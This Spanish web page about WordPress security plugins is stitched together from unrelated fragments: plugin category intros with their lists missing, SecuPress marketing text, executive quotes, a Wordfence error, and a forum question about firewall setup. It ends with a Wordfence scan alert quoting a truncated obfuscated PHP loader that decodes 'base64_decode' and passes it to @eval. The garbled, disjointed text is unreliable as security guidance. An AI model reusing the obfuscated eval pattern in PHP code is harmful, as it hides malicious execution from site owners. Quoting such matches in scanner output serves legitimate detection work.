SecurePress seguridad total en WordPress

Antivirus WordPress

No hay nada más molesto que los comentarios spam. Uno desearía que sólo fueran molestos. Pero no sólo eso. Pueden dañar su sitio web y su credibilidad si no tiene demasiado cuidado. Estos plugins pueden ayudarle a lidiar con los comentarios de spam:Añadir autenticación a su sitio webSi usted está planeando implementar HTTP o autenticación de base de datos en su sitio web, los siguientes elementos pueden hacer el proceso mucho más fácil:Copia de seguridad de su WordPress DBEvery WordPress webmaster debe tomar tiempo para hacer copias de seguridad de su DB. Es mejor prevenir que curar. Estos plugins de copia de seguridad le ayudan a proteger su blog y sus datos contra desastres:

No todas las entradas de tu blog tienen por qué ser públicas. A veces, puede que quieras publicar información sensible en tu blog pero quieras dar acceso a ciertas personas. Estos plugins pueden ayudarte a conseguirlo:Gestión de usuarios y sus funciones

Aquellos de ustedes que tienen un sitio de membresía o permiten el registro de usuarios en su sitio web de WordPress deben tomarse el tiempo para gestionar sus usuarios y protegerse contra ataques de hackers. Las siguientes soluciones pueden ayudarle a conseguirlo:Al fin y al cabo, no quiere correr ningún riesgo con su sitio web de WordPress. Si bien es imposible detener todos los ataques de hackers, los plugins anteriores hacen la vida mucho más difícil para los spammers, hackers y ladrones de contenido.¿Qué plugins de seguridad de WordPress está utilizando para proteger su sitio web?Más Consejos WP:

  Mostrar información sobre tu red multisitio

Cortafuegos de WordPress

SecuPress es el único plugin con un escáner completo capaz de solucionar los problemas por usted. Y cuando requiera una decisión por tu parte, te preguntará antes de proceder. Con esta función, puede comprobar 35 puntos de seguridad en 5 minutos y dejar que nosotros nos encarguemos del resto.

Esta función es la forma más fácil de asegurarse de que los datos de sus usuarios están protegidos y de evitar que sus cuentas se vean comprometidas. Con esta función puede limitar el número de intentos de inicio de sesión incorrectos, prohibir los intentos de inicio de sesión de nombres de usuario inexistentes y establecer una franja horaria de no inicio de sesión. SecuPress también se asegura de que pueda evitar dobles inicios de sesión y controlar sus sesiones.

SecuPress lleva la seguridad más allá limitando la activación, desactivación, instalación y eliminación de plugins en su sitio web de producción (en vivo). Las subidas de plugins y temas a través de archivos .zip también estarán bloqueadas para bloquear esta fácil ruta de pirateo.

¿Sabías que el 60% del tráfico en Internet es generado por bots? La mayoría de ellos son robots de spam. Hemos desarrollado nuestro propio sistema antispam que funciona silenciosamente en segundo plano. Sólo tienes que activarlo y disfrutar de una experiencia libre de spam.

WordPress plugin de seguridad de inicio de sesión

“Los perímetros de seguridad bien mantenidos son excelentes para las amenazas básicas, pero los atacantes suelen estar preparados para atravesar estas barreras. Y nos encontramos en un punto de inflexión en el que las organizaciones se ven obligadas a afrontar el hecho de que sufrir una brecha de seguridad no es una cuestión de “si”, sino de “cuándo””, afirma Tulokas. “Pero el lado positivo de esto es que las organizaciones dispuestas a afrontar esta realidad con las capacidades de seguridad adecuadas tienen una oportunidad que cambia el juego para obtener una ventaja sobre los atacantes”.

  Saber si una web está creada con WordPress

“Un truco habitual en los ataques modernos es disfrazar la actividad maliciosa como algo normal, y los atacantes siempre encuentran nuevas formas de hacerlo. Y puesto que hay un número incontable de cosas normales que suceden en cualquier entorno, es básicamente imposible que las empresas confíen en expertos humanos o en la inteligencia artificial por sí solos para peinar todos esos datos”, dijo Stahlberg. “La inteligencia artificial entrenada por los mejores expertos en ciberseguridad es vital cuando se buscan agujas en un pajar digital, y en las manos adecuadas, es capaz de mantener a los defensores un paso por delante incluso de los atacantes más hábiles y altamente motivados.”

Seguridad Cleantalk

No hemos podido crear el archivo wordfence-waf.php en la raíz de la instalación de WordPress. Es posible que WordPress no pueda escribir en el archivo wordfence-waf.php debido a los permisos del archivo. Compruebe que los permisos son correctos y vuelva a intentar la instalación.

Utilizo Wordfence en varios sitios y me he dado cuenta de que sólo hay una forma de activar la protección ampliada del cortafuegos. Antes de algo que no pude identificar, las líneas de código en el archivo htaccess php_value auto_prepend_file ‘path-to-waf.php’ funcionaban bien.

  ¿Eres Adicto a WordPress?

Ahora necesito añadir el ‘path-to-waf.php’ dentro de la página de opciones PHP de cPanel, de lo contrario no consigo que funcione la protección extendida. Me preguntaba por qué se ha producido este cambio de comportamiento, si tiene alguna idea.

He revisado toda la documentación sobre la optimización del cortafuegos y la solución de problemas, pero hasta ahora nada de lo que he probado ha funcionado. ¿Existe algún registro que pueda consultar para averiguar qué es lo que bloquea el proceso?

Detalles: Este archivo parece haber sido instalado o modificado por un hacker para realizar actividades maliciosas. Si conoce este archivo puede elegir ignorarlo para excluirlo de futuros escaneos. El texto coincidente en este archivo es: $debcfb4e=”\142\x61\163\x65\x36\x34\137\x64\145\143\157\144\145″;@eval($debcfb4e(